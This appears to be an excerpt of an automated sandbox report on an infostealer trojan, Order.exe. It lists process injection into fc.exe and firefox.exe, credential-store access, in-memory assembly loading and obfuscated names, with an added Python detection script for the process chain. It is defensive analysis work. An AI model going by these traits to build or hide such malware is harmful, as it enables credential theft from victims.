                Source: Order.exe, 00000009.00000002.1782419034.0000000001ABD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Order.exe
                Source: Order.exe | Binary or memory string: OriginalFilenameUYVh.exed" vs Order.exe
                Source: Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.Order.exe.70a0000.3.raw.unpack, vr5o4TCnKABqtW5kUU.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Order.exe.3b41da0.1.raw.unpack, vr5o4TCnKABqtW5kUU.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/8
                Source: C:\Users\user\Desktop\Order.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order.exe.log
                Source: C:\Users\user\Desktop\Order.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\fc.exe | File created: C:\Users\user~1\AppData\Local\Temp\0349A-n
                Source: Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Order.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: fc.exe, 0000000C.00000003.2025497853.000000000348A000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3119481100.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3119481100.000000000348A000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.2027678662.0000000003494000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Order.exe | ReversingLabs: Detection: 24%
                Source: unknown | Process created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                Source: C:\Users\user\Desktop\Order.exe | Process created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
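The process chain in the rows above (Order.exe re-launching its own image, the dropped copy under a randomly named Program Files (x86) directory starting C:\Windows\SysWOW64\fc.exe with no arguments, and fc.exe in turn starting firefox.exe) is the part of this report that converts most directly into a detection: fc.exe is a file-comparison utility and has no business spawning a browser. The following is an added example, not part of the Joe Sandbox report and not a vendor rule: three heuristics run over constructed process-creation events modelled on those rows. The random-directory regex, the browser list, the allow-list of system launchers, and the PIDs are assumptions to tune per environment; the report does not show who launched the first Order.exe or lOYqgVWsbtwCn.exe, so those parents are left unknown.

```python
import re

# Constructed process-creation events modelled on the "Process created" rows of this
# report. PIDs are invented for the example; where the report shows no parent, ppid is 0.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Users\user\Desktop\Order.exe",
     "cmdline": r'"C:\Users\user\Desktop\Order.exe"'},
    {"pid": 9, "ppid": 1, "image": r"C:\Users\user\Desktop\Order.exe",
     "cmdline": r'"C:\Users\user\Desktop\Order.exe"'},
    {"pid": 11, "ppid": 0,
     "image": r"C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe",
     "cmdline": r'"C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe"'},
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\SysWOW64\fc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\fc.exe"'},
    {"pid": 13, "ppid": 12, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    # Benign control (constructed): an operator comparing two files from a shell must not alert.
    {"pid": 20, "ppid": 0, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 21, "ppid": 20, "image": r"C:\Windows\SysWOW64\fc.exe",
     "cmdline": r"fc.exe C:\tmp\a.txt C:\tmp\b.txt"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: extend the browser list to whatever is deployed in the estate.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Assumption: shells and the service host are the system-directory processes that
# legitimately open browsers; everything else in System32/SysWOW64 is suspicious.
SYSTEM_BROWSER_LAUNCHERS = {"cmd.exe", "powershell.exe", "svchost.exe", "runtimebroker.exe"}
# Assumption: a directory and file name that are both long runs of bare alphanumerics,
# directly under Program Files, are treated as random. Tune the minimum lengths.
RANDOM_PROGFILES = re.compile(
    r"^c:\\program files( \(x86\))?\\[a-z0-9]{16,}\\[a-z0-9]{8,}\.exe$", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _no_arguments(event):
    """True when the command line is only the (optionally quoted) image path."""
    return event["cmdline"].strip().strip('"').lower() == event["image"].lower()


def findings(events):
    """Return (rule, pid) pairs for every event that matches one of the three heuristics."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # no parent on record; nothing to correlate against
        image, parent_image = e["image"].lower(), parent["image"].lower()
        # 1. A process re-launching its own image bare: the self-spawn of the .NET
        #    loader (Order.exe -> Order.exe) that precedes injection in this report.
        if image == parent_image and _no_arguments(e):
            hits.append(("self_spawn_same_image", e["pid"]))
        # 2. A randomly named Program Files binary starting a system utility with no
        #    arguments (lOYqgVWsbtwCn.exe -> fc.exe).
        if RANDOM_PROGFILES.match(parent_image) and image.startswith(SYSTEM_DIRS) and _no_arguments(e):
            hits.append(("random_progfiles_parent_spawns_system_util", e["pid"]))
        # 3. A system-directory utility that is not a shell launching a browser
        #    (fc.exe -> firefox.exe), which fc.exe never does on its own.
        if (parent_image.startswith(SYSTEM_DIRS)
                and _basename(parent_image) not in SYSTEM_BROWSER_LAUNCHERS
                and _basename(image) in BROWSERS):
            hits.append(("system_utility_spawns_browser", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in findings(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Run against the constructed events, the three malicious links of the chain each produce one hit and the cmd.exe control produces none. The same three rules translate directly into Sysmon event 1 or EDR process-start queries; the command-line check matters because hollowed utilities are started with nothing but their own path, which an operator almost never does with fc.exe.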
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Order.exe | Section loaded: windowscodecs.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\fc.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Order.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\fc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: UYVh.pdbSHA256 source: Order.exe
                Source: Binary string: fc.pdb source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: Order.exe, 00000009.00000002.1782237155.0000000001468000.00000004.00000020.00020000.00000000.sdmp, lOYqgVWsbtwCn.exe, 0000000B.00000003.1717371395.00000000005F5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UYVh.pdb source: Order.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lOYqgVWsbtwCn.exe, 0000000B.00000002.3121159220.00000000001DE000.00000002.00000001.01000000.0000000D.sdmp (note, added in editing: this PDB path belongs to Joe Sandbox's own FakeChrome tool, i.e. to the analysis environment, and should not be treated as an indicator of the sample)
                Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 0000000C.00000003.1789911041.0000000003718000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 0000000C.00000003.1788185386.000000000356D000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

Source: Order.exe, FormTada.cs | .Net Code: InitializeComponent
Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | .Net Code: ee6iDshbFw System.Reflection.Assembly.Load(byte[]) (loads an assembly from a byte array in memory, the usual .NET unpacking step: the next stage never touches disk)
Source: 0.2.Order.exe.3b41da0.1.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | .Net Code: ee6iDshbFw System.Reflection.Assembly.Load(byte[])
Source: 11.2.lOYqgVWsbtwCn.exe.58fcd14.1.raw.unpack, FormTada.cs | .Net Code: InitializeComponent
Source: 12.2.fc.exe.3fdcd14.2.raw.unpack, FormTada.cs | .Net Code: InitializeComponent
Source: 16.2.firefox.exe.3b0fcd14.0.raw.unpack, FormTada.cs | .Net Code: InitializeComponent
Source: Order.exe | Static PE information: 0xA7A1B934 [Thu Feb 13 20:29:40 2059 UTC] (the COFF link timestamp lies decades in the future, so it has been forged or randomised; a common packer trait and a cheap static triage check)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EBA122 push edx; iretd (0_2_00EBA123)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EBC441 push cs; iretd (0_2_00EBC44E)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EBC529 push cs; iretd (0_2_00EBC536)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EB5718 pushfd; iretd (0_2_00EB5732)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_00EB9C41 push 30028593h; iretd (0_2_00EB9C4D)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D00013 push es; ret (0_2_06D0001C)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_06D0618A push esp; retf (0_2_06D06191)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_070923A6 push cs; iretd (0_2_070923A7)
Source: C:\Users\user\Desktop\Order.exe | Code function: 0_2_07092971 push esp; iretd (0_2_0709297D)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0041600F push esp; retf (9_2_00416030)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00405119 push ss; retf (9_2_0040511A)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0040AA27 push cs; iretd (9_2_0040AA28)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004142D9 push esp; retf (9_2_004142DA)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00403330 push eax; ret (9_2_00403332)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0041844F push eax; iretd (9_2_00418450)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_004165B3 push 00000032h; ret (9_2_004166AF)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00416662 push 00000032h; ret (9_2_004166AF)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00404EDD push ds; iretd (9_2_00404EED)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00418EF6 pushfd; ret (9_2_00418F00)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00416683 push 00000032h; ret (9_2_004166AF)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00404EB6 push ecx; iretd (9_2_00404EC1)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0041175E pushad; retf (9_2_0041176E)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_00406737 push eax; retf (9_2_0040673B)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0199225F pushad; ret (9_2_019927F9)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019927FA pushad; ret (9_2_019927F9)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_019C09AD push ecx; mov dword ptr [esp], ecx (9_2_019C09B6)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_0199283D push eax; iretd (9_2_01992858)
Source: C:\Users\user\Desktop\Order.exe | Code function: 9_2_01991200 push eax; iretd (9_2_01991369)
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A4300B push es; ret (11_2_00A42FA5)
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A349BE push ecx; iretd (11_2_00A349C9)
Source: C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe | Code function: 11_2_00A349E5 push ds; iretd (11_2_00A349F5)
Source: Order.exe | Static PE information: section name: .text entropy: 7.973818624888397
Source: 0.2.Order.exe.70a0000.3.raw.unpack, LRToqTRMv79ZE70a2X.cs | High entropy of concatenated method names: 'YGEgZRICS4', 'rTWgAY2cRC', 'ASDgRspm3h', 'kWOgUi3cMk', 'E9Ug4Ce3A5', 'EZSgqhySJf', 'Gwog5ZFWli', 'A5hg8GEHrl', 'iQdgK3xXG4', 't8cgbvfLXv'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, gWrW1AMb5JSFn78s7W.cs | High entropy of concatenated method names: 'Ix1kgetJpC', 'eDakI6SLao', 'OdxkkWvPlk', 'f3HkGWXAhw', 'pjjk6qMRdr', 'cOdkcngYxG', 'Dispose', 'SqdlNxDFni', 'mqBlWWicMY', 'KC5l2tpOZF'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, QH2qCN3DXJ76e9ZhjZ.cs | High entropy of concatenated method names: 'kmTjYdKSxJ', 'SvvjmgBxRE', 'YLK2qMhpx3', 'pAU25htolF', 'w9J28l8RlI', 'jBJ2K7eGmw', 'ML42bHIqXj', 'Um22B0DLnX', 'SSc2VQf5Vo', 'drQ2ZidQ52'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, CcSwQRsFuLY5V9HHwb.cs | High entropy of concatenated method names: 'YJhI71DW7D', 'W5WIEwKqIi', 'ToString', 'AnhINhN9Ui', 'kXYIWCvNAS', 'ofrI2yDJ5O', 'ispIj9iPOx', 'rApIJoqq81', 'HiqIfASSQd', 'qswIOmIM1F'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, IFb9yXHQYsT6aGaYKe.cs | High entropy of concatenated method names: 'W8nDty2cT', 'bfl9Cmjnf', 'NCL0nZ6PK', 'NYMmGGlgW', 'J5Lu9I7iJ', 'T2K3oC9BL', 'vCY8WQFPD0yBysfKnY', 'ohJejHWNy0pVJnbH3P', 'lk1lD2oI2', 'lshLqSR8c'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, ct5GO8Sa4yp6boot2fh.cs | High entropy of concatenated method names: 'TsPGt2iQSE', 'N9YGzmksKQ', 'YAyvTAOymK', 'WnFpiJxUP25juncTaOG', 'VgANlsxziJyht4pm3YP', 'X35FM7J768gchgT6l2B', 'LeqNdYJ86RvXrp3A8V8'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, WOvEGlbFUFuoitoiSB.cs | High entropy of concatenated method names: 'yw7fNaC4Oi', 'hXpf2xD1VT', 'J3ifJselXZ', 'ojpJtGRMWn', 'B0UJzHXQle', 'cKtfTivkUA', 'veNfSYMSUq', 'GePfHtWQPi', 'jHxfangAlJ', 'YWrfijYrEx'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, DmlG0vuofs9SjDZNsk.cs | High entropy of concatenated method names: 'RCD29Zca1R', 'ure20ri5rF', 'Ta92CIC9u6', 'ndE2u33sQ9', 'Vom2g4thvg', 'm8L2dQ5cvE', 'CK42IEgx17', 'fEm2lb5p2d', 'kd22ksKATv', 'AnP2LTG1SD'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, vLkQu0h9flEgOBwxpG.cs | High entropy of concatenated method names: 'Ee4nCqJVBX', 'jLWnur53f5', 'uaCnX9X61t', 'j4nn4nNKA4', 'cuan5DH1b3', 'V8Dn8dWajt', 'AlAnbaUSbj', 'qkMnB5l5eu', 'd5HnZ1C9yA', 'LAonwuWi7Q'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, DEcfA0tReK6vAshi84.cs | High entropy of concatenated method names: 'sqcL2PcEO8', 'YMqLjME8JH', 'SkKLJI7WGr', 'py0Lf0TtA9', 'ykhLk5MgUj', 'lSFLOTeU37', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, prCQ0nSTHWVoHsFE2hl.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UyQLwxLNK5', 'hDsLAu8LCL', 'XE5LhEZhAq', 'UVpLRWSyTN', 'KWELUSkWPW', 'I1aLQU5Uyj', 'LLtLssELWt'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, GrbfCDO2Fb3aiPmKSc.cs | High entropy of concatenated method names: 'm1iaxRBYWS', 'OayaNyUpO3', 'xbeaWHWEGI', 'il9a2iYPVL', 'mUGajydVva', 'MslaJpwdL2', 'sccaf5T6FB', 'kIGaOXC0FH', 'ECIaeTDapI', 'nvSa7cBhxK'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, vr5o4TCnKABqtW5kUU.cs | High entropy of concatenated method names: 'iRoWR5D8Bn', 'hqTWU5wVQa', 'T3dWQ7xEIs', 'smfWs0n5My', 'nV3WrMICoH', 'rsTWFaMRX2', 'FkgWMRLxu9', 'qpaWy0R0pX', 'QA6W1N52ia', 'wIGWtRghsD'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, wDVu3IFeNnoDIiIgEw.cs | High entropy of concatenated method names: 'Dg9IyofeUe', 'ejQIt0NDIy', 'OfylTk9g2o', 'SwRlSEK2xh', 'BdsIwGUqn7', 'PgYIApAKTA', 'hn2Ih4OV07', 'QCSIRAMtkD', 'fglIUnL4fc', 'MERIQiVI5y'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, MDbR9JXFa83jJGxJTI.cs | High entropy of concatenated method names: 'A0bJxDAcZq', 'dnVJWj2p04', 'S7YJjGvqOW', 'FQEJfuDX1n', 'QIcJOLkf6Y', 'lFUjr3k247', 'lZTjFg4nGc', 'y01jMn3D8Y', 'uGkjyt1gTY', 'TtBj13ACgy'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, S0yPV81WU0AT3cSA2x.cs | High entropy of concatenated method names: 'WqikX0cC0I', 'YVuk4BrYwd', 'qRnkqWxdUh', 'axUk52FyKW', 'RBCk8RIbHb', 'W6dkKNDpDT', 'NVKkbw29hi', 'Y4EkB9TQ8W', 'VKxkV5sksD', 'rMqkZYp0MV'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, CH8dJ1irwJ3NvXoVkm.cs | High entropy of concatenated method names: 'Rx6Sfr5o4T', 'oKASOBqtW5', 'uofS7s9SjD', 'ONsSEkhH2q', 'AZhSgjZVDb', 'R9JSdFa83j', 'TEl50K01TCkpnhwSZf', 'mJ530PDGxVoYr9YL5I', 'tipSSrCVY0', 'QmjSawHE0E'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, QIkfoDQ92Aa3eL9Mpc.cs | High entropy of concatenated method names: 'ToString', 'PL8dwp8q86', 'R3pd4pE1Ok', 'Jq9dqmOm1A', 'J8Nd5k4MLp', 'Lp2d8U2xxE', 'XKmdK2Yaw9', 'qLkdbJtB1m', 'FyZdBD7yxC', 'qOVdVsijBJ'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, XTxC8FVy1NLH6R5H92.cs | High entropy of concatenated method names: 'erSfPFncTV', 'Gh6fpnbRsR', 'FjifDXkeyD', 'o3if9iXV1V', 'cD9fYLNhUy', 'Vc2f0bQU9N', 'P4sfmKepVc', 'Dr6fCp4TGk', 'X4Zfu85sAd', 'EXXf3YBUUr'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, g7UVknWmsuA9pOFpK5.cs | High entropy of concatenated method names: 'Dispose', 'jSFS1n78s7', 'U2yH4UDUl7', 'gL1KVCwT8l', 'gLoStDs3fL', 'JsrSzo7CHU', 'ProcessDialogKey', 'MMUHT0yPV8', 'gU0HSAT3cS', 'P2xHHCEcfA'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, NIA8NLSSkVYIuvjbdU5.cs | High entropy of concatenated method names: 'Ad8LtEMC5A', 'D2sLzFMfX5', 'fexGTRHZr9', 'qsUGSHDXai', 'fAUGHgeZxw', 'uyAGaBZTJi', 'UmhGiUGLCN', 'MtNGx2dOHH', 'j99GNqIKbn', 'kMXGW4YAeK'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, Hhy3r4Sihn5qn2D1yYj.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YflvkJaK5J', 'ofRvLuWVUI', 'CCuvGjK977', 'fQdvv0PENM', 'Lpqv6Esg55', 'loQvowdp1X', 'CvTvcGQMjs'
Source: 0.2.Order.exe.70a0000.3.raw.unpack, SBFl3szAN9BIAopKeP.cs | High entropy of concatenated method names: 'jmZL0JwiYB', 'mtnLCKLvpv', 'NQhLuyRpJS', 'lk2LXjfBMZ', 'L83L4VbcLp', 'PJNL5cKtZo', 'le5L8lhCdJ', 'qmxLcqpf6V', 'hG0LPDBG3X', 'XaVLpgT2au'
